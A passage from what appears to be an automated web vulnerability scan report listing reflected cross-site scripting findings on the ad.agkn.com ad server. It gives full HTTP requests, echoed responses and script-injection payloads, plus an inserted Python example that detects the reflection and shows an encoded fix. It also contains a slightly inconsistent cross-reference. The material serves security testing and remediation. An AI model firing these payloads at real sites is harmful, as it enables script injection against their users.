<a href=\"http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115";alert(1)//760f2f14d5b=1http://ad.agkn.com/interaction!che=1802253544?imid=6357708857464532341&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.6. http://ad.agkn.com/iframe!t=1129! [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5340"><script>alert(1)</script>140300babcc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcc HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAA8BArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flJrtfJ6qWCjAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=e5340"><script>alert(1)</script>140300babcchttp://ad.agkn.com/interaction!che=392546480?imid=5939040586662764707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.7. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81d44"><script>alert(1)</script>6ee1469f996 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJQAAAAAAwBArwBATUBC%2FEB0AADAUIBBoABQwEGgAFBAQaAAQK8fnjlj%2BuxPLfUAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=34427248279872173381d44"><script>alert(1)</script>6ee1469f996&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1603187548?imid=8711527296671725524&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Con
...[SNIP]...
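Findings 2.7 through 2.12 above on ad.agkn.com, and 2.17 and 2.18 below on adserver.teracent.net, share one sink: a request parameter is concatenated into a double-quoted href attribute, so a value containing `"><script>` closes the attribute and opens a new tag, and the scanner's "echoed unmodified" verdict means the quote and angle brackets came back byte-for-byte. The Python below is an added example, not part of the Burp report and not code from any of the ad servers. It reproduces the scanner's verdict offline (is the canary reflected, is it unmodified, does it sit inside a double-quoted attribute value, can it break out) against a constructed mirror of the sink, and puts the vulnerable renderer beside a hardened one that attribute-encodes the value and also rejects non-http(s) schemes, since encoding alone would still let a `javascript:` URL through in an href. The canary prefix and suffix, the `render_*` templates and the scheme policy are assumptions made for this example.

```python
import html
import re
from urllib.parse import urlsplit

# Canary in the shape Burp used for these findings: random prefix, an attribute
# break-out, random suffix. Constructed for this example, not copied from the report.
PREFIX, SUFFIX = "81d44", "6ee1469f996"
PAYLOAD = f'{PREFIX}"><script>alert(1)</script>{SUFFIX}'
# A clk1-style value with the canary appended, as the scanner submitted it.
INJECTED = "http://pixel.mathtag.com/click/img?mt_aid=1" + PAYLOAD


def render_vulnerable(clk1: str) -> str:
    """Hypothetical mirror of the sink: the parameter is concatenated into href."""
    return f'<a href="{clk1}">ad</a>'


def render_fixed(clk1: str) -> str:
    """Same template, hardened: reject non-http(s) schemes (encoding alone would still
    let javascript: through in an href), then attribute-encode quotes and angle brackets."""
    if urlsplit(clk1).scheme.lower() not in ("http", "https"):
        clk1 = "about:blank"  # policy choice for this example
    return f'<a href="{html.escape(clk1, quote=True)}">ad</a>'


def find_reflections(body: str, prefix: str, suffix: str) -> list:
    """Every substring of body that lies between the canary prefix and suffix.
    'Echoed unmodified' in the report means the exact break-out text appears here."""
    pattern = re.compile(re.escape(prefix) + r"(.*?)" + re.escape(suffix), re.S)
    return [m.group(1) for m in pattern.finditer(body)]


def in_double_quoted_attribute(body: str, index: int) -> bool:
    """True if body[index] sits inside a double-quoted attribute value: walk back to the
    nearest '<' and count the quotes since then (odd count = still inside a value).
    A heuristic that is sufficient for the single-line <a href="..."> sinks in this report."""
    tag_start = body.rfind("<", 0, index)
    return tag_start != -1 and body[tag_start:index].count('"') % 2 == 1


def classify(body: str, prefix: str, suffix: str, payload: str) -> dict:
    """Reproduce the scanner's verdict for one response body."""
    verdict = {"reflected": False, "unmodified": False,
               "attribute_context": False, "breaks_out": False}
    reflections = find_reflections(body, prefix, suffix)
    if not reflections:
        return verdict
    middle = payload[len(prefix):-len(suffix)]          # the '"><script>...' part
    verdict["reflected"] = True
    verdict["unmodified"] = middle in reflections
    verdict["attribute_context"] = in_double_quoted_attribute(body, body.find(prefix))
    # A break-out needs a raw '"' to close the attribute and a raw '<' to open a tag.
    verdict["breaks_out"] = (verdict["unmodified"] and verdict["attribute_context"]
                             and '"' in middle and "<" in middle)
    return verdict


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(name, classify(render(INJECTED), PREFIX, SUFFIX, PAYLOAD))
```

Against the vulnerable mirror every flag comes back true; against the hardened one the canary is still reflected (the scanner would still see its prefix and suffix) but as `&quot;&gt;&lt;script&gt;...`, so the break-out check fails. Reflection alone is therefore not the finding; reflection of the unencoded delimiter inside the attribute is.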

2.8. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db7ef"><script>alert(1)</script>a402f89f56b was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:05 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJRAAAAABABArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjT3r%2FI4Pw%2BjAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:05 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060db7ef"><script>alert(1)</script>a402f89f56b&redirect=http://ad.agkn.com/interaction!che=1794660149?imid=3816712664080388003&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Produc
...[SNIP]...

2.9. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dd2"><script>alert(1)</script>488066488aa was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJQAAAAAA4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjzlQUQ4QovRAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=12641388dd2"><script>alert(1)</script>488066488aa&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1106824953?imid=4387985173199883217&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.10. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 372d8"%3balert(1)//04ade7f7217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372d8";alert(1)//04ade7f7217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8"%3balert(1)//04ade7f7217=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:08 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNJUAAAAABYBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fkadB%2FcIop4dAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:08 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&372d8";alert(1)//04ade7f7217=1http://ad.agkn.com/interaction!che=1298692797?imid=5088231911581720093&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.11. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f604e"><script>alert(1)</script>3e78bbef9e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=&f604e"><script>alert(1)</script>3e78bbef9e2=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:07 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
